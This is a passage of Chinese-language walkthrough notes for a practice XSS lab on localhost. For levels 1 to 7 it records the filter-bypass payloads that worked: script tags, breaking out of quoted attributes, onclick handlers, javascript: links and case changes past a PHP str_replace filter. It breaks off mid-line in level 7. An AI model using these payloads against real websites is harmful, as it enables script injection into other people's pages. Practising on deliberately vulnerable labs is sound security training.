- Pass-1
127.0.0.1/xss/level1.php?name=<script>alert(1)</script>
通过
- Pass-2
直接插入不行,引号将其包裹起了
http://127.0.0.1/xss/level2.php?keyword="><script>alert(1)</script><--
- Pass-3
审查元素看看
看似和2没啥区别 但与level2不同的是,value做了校验,双引号和尖括号都被校验了
可以集合单引号和事件来触发
‘ onclick='alert(1)
- Pass-4
可以看到对< >进行了过滤
由下图可以看出是双引号包裹得
" οnclick="alert(1)"
- Pass-5
对script进行了过滤
看了下还是双引号包裹
过滤了
" οnclick="alert(1)"
看手源码
"><a href='javascript:alert(1)'>
- Pass-6
过滤
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
可大小写绕过
"><Script>alert(1)</script>
- Pass-7
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on"